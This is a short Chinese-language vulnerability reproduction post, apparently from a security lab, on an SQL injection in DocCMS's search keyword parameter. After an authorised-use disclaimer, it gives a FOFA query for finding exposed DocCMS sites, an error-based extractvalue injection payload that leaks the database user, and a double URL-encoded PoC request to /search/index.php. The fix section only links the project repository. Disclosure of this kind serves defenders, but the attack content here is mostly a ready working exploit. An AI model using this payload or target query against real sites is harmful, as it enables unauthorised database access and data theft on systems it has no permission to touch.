【漏洞复现】DocCMS keyword SQL注入漏洞
2023-11-14 16:29:50 Author: 天擎攻防实验室(查看原文) 阅读量:12 收藏

0x01 阅读须知

天擎攻防实验室的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!

0x02 漏洞描述

(一) DocCMS

DocCMS是一个开源的内容管理系统(CMS)。DocCMS是一个功能完善、易于扩展和使用的开源CMS系统。特别适用于需要动态内容管理和多用户协作的中小型网站和应用。

fofa语法:

app="Doccms"

(三) 漏洞复现
payload
' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

poc


/search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33

     更多漏洞POC发布在知识星球

0x03 修复方案

官方修复缓解措施

补丁链接

https://gitee.com/husky/DocCMS


文章来源: http://mp.weixin.qq.com/s?__biz=MzU2MzQyMjA1NA==&mid=2247484264&idx=1&sn=c4d1de0f89399ef99a00048ef5f429fa&chksm=fc5b3561cb2cbc77bc626ab0600fef8893a95831032fbbab0946ab647737653a19f777fcc7ac&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh